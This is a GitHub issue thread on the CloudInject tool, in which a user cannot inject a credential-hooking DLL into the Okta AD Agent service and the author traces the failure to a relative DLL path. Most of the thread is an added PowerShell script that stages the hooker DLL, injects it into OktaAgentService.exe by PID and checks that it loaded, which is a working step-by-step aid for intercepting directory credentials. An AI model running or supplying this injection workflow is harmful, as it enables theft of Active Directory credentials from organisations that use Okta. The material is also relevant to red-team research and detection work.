xpn / CloudInject


Fail to inject OKTA AD Connector #1

Status: Closed (superboy-zjc closed this issue 4 months ago)

superboy-zjc commented 4 months ago

OS: Windows Server 2016
Okta AD Agent version: 3.17.0.0

I can manage to intercept the credential through x64dbg, but I fail to do so by injecting the DLL.


The way I compiled the hooker and injector:

x86_64-w64-mingw32-g++.exe .\hooker\hooker.cpp -o .\Hooker\hooker.dll -static -shared
x86_64-w64-mingw32-g++.exe .\Injector\injector.cpp -o .\Injector\injector.exe -static

I try to exploit, but nothing happens:

PS C:\Users\Administrator\Desktop\cloudinject\CloudInject-main> tasklist /FI  "IMAGENAME eq OKTA*"

Image Name                     PID Session Name        Session#    Mem Usage
========================= ======== ================ =========== ============
OktaAgentService.exe          6120 Services                   0     55,828 K
PS C:\Users\Administrator\Desktop\cloudinject\CloudInject-main> .\Injector\injector.exe 6120 .\Hooker\hooker.dll

Could you advise me how to solve this?

xpn commented 4 months ago

The issue looks to be because you are passing in a relative path to the DLL to inject.

The injector writes in the path to the DLL (.\Hooker\hooker.dll\0 is 20 bytes), and then within the OktaAgentService.exe it calls LoadLibrary(). So in this case it's going to do LoadLibrary(".\Hooker\hooker.dll") which will fail because OktaAgentService.exe doesn't know the full path.

I'll update the documentation, but for fixing this, move hooker.dll to a shared directory that OktaAgentService.exe can open, so C:\Tools\Hooker.dll for example, and then pass the full path to injector.exe, so injector.exe 6120 C:\Tools\Hooker.dll.

You can also make sure that the DLL is loaded using ProcessExplorer or SystemInformer.
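
A scripted version of the advice above, as an added example (this is not code from the CloudInject repository or from either participant in the thread). It stages the DLL in a fixed directory, refuses to inject anything but an absolute path, and then checks the target's module list instead of relying on Process Explorer. It assumes the repository layout shown in the issue (.\Injector\injector.exe and .\Hooker\hooker.dll), the C:\Tools location suggested in the reply, and an elevated 64-bit PowerShell session (the service runs in session 0, and Get-Process can only enumerate modules of a process with the same bitness that it has rights to open).

```powershell
# Added example, not part of CloudInject. Stage hooker.dll where the service can
# read it, inject it by ABSOLUTE path, then confirm it is mapped in the target.
# Assumes: repo layout from the issue, C:\Tools as the shared directory,
# elevated 64-bit PowerShell on the same host as OktaAgentService.exe.
param(
    [string]$ProcessName = 'OktaAgentService',
    [string]$Injector    = '.\Injector\injector.exe',
    [string]$DllSource   = '.\Hooker\hooker.dll',
    [string]$SharedDir   = 'C:\Tools'
)

$target = Get-Process -Name $ProcessName -ErrorAction Stop | Select-Object -First 1

# A relative path written into the remote process is resolved by LoadLibrary()
# against the SERVICE's working directory, not the operator's shell, so the
# load fails even though the injector itself reported nothing. Copy the DLL to a
# fixed location and hand the injector a fully qualified path instead.
New-Item -ItemType Directory -Path $SharedDir -Force | Out-Null
$dllPath = Join-Path -Path $SharedDir -ChildPath 'hooker.dll'
Copy-Item -Path $DllSource -Destination $dllPath -Force
$dllPath = (Resolve-Path -Path $dllPath).Path

if (-not [System.IO.Path]::IsPathRooted($dllPath)) {
    throw "Refusing to inject a non-absolute path: $dllPath"
}

# The service account (not the operator) is what opens the file, so show who
# has read/execute on it before touching the target.
(Get-Acl -Path $dllPath).Access |
    Select-Object IdentityReference, FileSystemRights, AccessControlType |
    Format-Table -AutoSize

& $Injector $target.Id $dllPath

# Re-query the process so the module list is not a stale snapshot, then look
# for our DLL by full path (what Process Explorer / System Informer would show).
Start-Sleep -Seconds 1
$loaded = (Get-Process -Id $target.Id).Modules |
    Where-Object { $_.FileName -ieq $dllPath }

if ($loaded) {
    'hooker.dll is loaded at base 0x{0:X} in PID {1}' -f $loaded.BaseAddress.ToInt64(), $target.Id
} else {
    Write-Error "hooker.dll not found in the module list of PID $($target.Id)"
}
```

If the final check reports the DLL as missing even with an absolute path, the remaining suspects are ones this script cannot see from the outside: the DLL's own DllMain failing (a dependency the service's environment cannot resolve, or a bitness mismatch between the DLL and the target), or the service account lacking read access to the file, which is why the ACL is printed first.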

xpn commented 4 months ago

Updated the README.md with an example: https://github.com/xpn/CloudInject/blob/main/README.md

superboy-zjc commented 4 months ago

Oh! it works now! Thanks for your help!

xpn commented 4 months ago

Thanks for confirming 🙏